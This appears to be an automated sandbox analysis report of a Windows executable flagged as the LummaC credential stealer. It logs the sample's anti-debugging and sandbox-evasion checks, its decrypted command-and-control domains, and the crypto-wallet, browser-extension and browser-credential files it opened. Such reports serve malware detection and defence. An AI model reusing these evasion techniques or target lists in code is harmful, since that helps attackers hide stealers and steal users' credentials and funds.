              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C06BB second address: 52C06CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFAC79DCCEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0737 second address: 52C0765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFFACBF2F91h 0x00000009 add ax, F1D6h 0x0000000e jmp 00007EFFACBF2F91h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0765 second address: 52C0777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edi, si 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0777 second address: 52B0E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, 074E2610h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f jmp 00007EFFACBF2F8Fh 0x00000014 je 00007F001D390E46h 0x0000001a xor eax, eax 0x0000001c jmp 00007EFFACBCC6BAh 0x00000021 pop esi 0x00000022 pop edi 0x00000023 pop ebx 0x00000024 leave 0x00000025 retn 0004h 0x00000028 nop 0x00000029 cmp eax, 00000000h 0x0000002c setne cl 0x0000002f xor ebx, ebx 0x00000031 test cl, 00000001h 0x00000034 jne 00007EFFACBF2F87h 0x00000036 jmp 00007EFFACBF30FBh 0x0000003b call 00007EFFB0E9D03Fh 0x00000040 mov edi, edi 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 mov si, A925h 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0E23 second address: 52B0E8C instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007EFFAC79DCCAh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007EFFAC79DCCEh 0x00000018 adc si, 8D68h 0x0000001d jmp 00007EFFAC79DCCBh 0x00000022 popfd 0x00000023 pushad 0x00000024 mov esi, 082B1275h 0x00000029 push esi 0x0000002a pop edx 0x0000002b popad 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f jmp 00007EFFAC79DCCCh 0x00000034 xchg eax, ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007EFFAC79DCD7h 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0E8C second address: 52B0ECB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007EFFACBF2F91h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFFACBF2F8Dh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0ECB second address: 52B0EF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], 55534552h 0x00000010 pushad 0x00000011 mov esi, 4E6D6D83h 0x00000016 push eax 0x00000017 push edx 0x00000018 mov cl, 25h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0C3B second address: 52C0CA6 instructions: 0x00000000 rdtsc 0x00000002 call 00007EFFACBF2F95h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bl, cl 0x0000000f pushfd 0x00000010 jmp 00007EFFACBF2F99h 0x00000015 or al, FFFFFFE6h 0x00000018 jmp 00007EFFACBF2F91h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 jmp 00007EFFACBF2F8Eh 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov dx, 1DA0h 0x0000002e mov ax, dx 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0CA6 second address: 52C0CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFAC79DCD1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0CBB second address: 52C0CE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [75AB459Ch], 05h 0x0000000f jmp 00007EFFACBF2F8Dh 0x00000014 je 00007F001D380CAEh 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0CE3 second address: 52C0CE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0CE9 second address: 52C0CF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, al 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0D27 second address: 52C0DBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 mov edi, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 7FE5E10Dh 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007EFFAC79DCD1h 0x00000017 or cx, F776h 0x0000001c jmp 00007EFFAC79DCD1h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007EFFAC79DCD0h 0x00000028 jmp 00007EFFAC79DCD5h 0x0000002d popfd 0x0000002e popad 0x0000002f xor dword ptr [esp], 0A4F7D25h 0x00000036 jmp 00007EFFAC79DCCEh 0x0000003b call 00007F001CF32A9Ah 0x00000040 push 75A52B70h 0x00000045 push dword ptr fs:[00000000h] 0x0000004c mov eax, dword ptr [esp+10h] 0x00000050 mov dword ptr [esp+10h], ebp 0x00000054 lea ebp, dword ptr [esp+10h] 0x00000058 sub esp, eax 0x0000005a push ebx 0x0000005b push esi 0x0000005c push edi 0x0000005d mov eax, dword ptr [75AB4538h] 0x00000062 xor dword ptr [ebp-04h], eax 0x00000065 xor eax, ebp 0x00000067 push eax 0x00000068 mov dword ptr [ebp-18h], esp 0x0000006b push dword ptr [ebp-08h] 0x0000006e mov eax, dword ptr [ebp-04h] 0x00000071 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000078 mov dword ptr [ebp-08h], eax 0x0000007b lea eax, dword ptr [ebp-10h] 0x0000007e mov dword ptr fs:[00000000h], eax 0x00000084 ret 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007EFFAC79DCD7h 0x0000008c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0DBC second address: 52C0DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFACBF2F94h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0E59 second address: 52C0E7B instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007F001CF217EAh 0x0000000e pushad 0x0000000f jmp 00007EFFAC79DCD0h 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0E7B second address: 52C0EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 cmp dword ptr [ebp+08h], 00002000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFFACBF2F99h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0EA3 second address: 52C0EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0EA9 second address: 52C0EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E074E second address: 52E0818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov si, E3D3h 0x0000000f pushfd 0x00000010 jmp 00007EFFAC79DCD8h 0x00000015 sbb cx, 5F58h 0x0000001a jmp 00007EFFAC79DCCBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007EFFAC79DCD4h 0x0000002a sub ax, 69B8h 0x0000002f jmp 00007EFFAC79DCCBh 0x00000034 popfd 0x00000035 mov ax, DDEFh 0x00000039 popad 0x0000003a xchg eax, esi 0x0000003b pushad 0x0000003c mov ah, 9Bh 0x0000003e pushfd 0x0000003f jmp 00007EFFAC79DCCDh 0x00000044 add ax, 5456h 0x00000049 jmp 00007EFFAC79DCD1h 0x0000004e popfd 0x0000004f popad 0x00000050 push eax 0x00000051 jmp 00007EFFAC79DCD1h 0x00000056 xchg eax, esi 0x00000057 jmp 00007EFFAC79DCCEh 0x0000005c mov esi, dword ptr [ebp+0Ch] 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 movsx ebx, si 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0818 second address: 52E081D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0953 second address: 52E0974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFFAC79DCCDh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0974 second address: 52E097A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E09E1 second address: 52E09E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, ecx 0x00000006 popad 0x00000007 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 102EDB5 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11F7CFF instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11D25AE instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 125C978 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 8841Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7720Thread sleep count: 58 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7720Thread sleep time: -116058s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7716Thread sleep count: 58 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7716Thread sleep time: -116058s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7800Thread sleep time: -36000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7816Thread sleep time: -210000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7700Thread sleep count: 102 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7700Thread sleep time: -204102s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7704Thread sleep count: 306 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7704Thread sleep time: -612306s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7696Thread sleep count: 126 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7696Thread sleep time: -252126s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7692Thread sleep count: 115 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7692Thread sleep time: -230115s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7704Thread sleep count: 8841 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7704Thread sleep time: -17690841s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, 00000000.00000002.2350473775.00000000011AC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: file.exe, file.exe, 00000000.00000003.2349307022.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2340811577.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1950914872.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1950914872.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1862847814.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2351702474.000000000146A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2351859716.0000000001488000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2351614272.000000000140E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: file.exe, 00000000.00000003.1863469629.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: file.exe, 00000000.00000002.2350473775.00000000011AC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: scriptyprefej.store
              Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: navygenerayk.store
              Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: founpiuer.store
              Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacedmny.store
              Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: thumbystriw.store
              Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fadehairucw.store
              Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crisiwarny.store
              Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: presticitpo.store
              Source: file.exe, 00000000.00000002.2350852255.00000000011F5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ^Program Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, file.exe, 00000000.00000003.1950914872.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1950914872.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2339998512.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1958054231.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354605740.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1950815118.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7636, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: file.exeString found in binary or memory: Wallets/Electrum-LTC
              Source: file.exeString found in binary or memory: Wallets/ElectronCash
              Source: file.exeString found in binary or memory: Jaxx Liberty
              Source: file.exeString found in binary or memory: window-state.json
              Source: file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: file.exeString found in binary or memory: Wallets/Exodus
              Source: file.exeString found in binary or memory: %appdata%\Ethereum
              Source: file.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exeString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
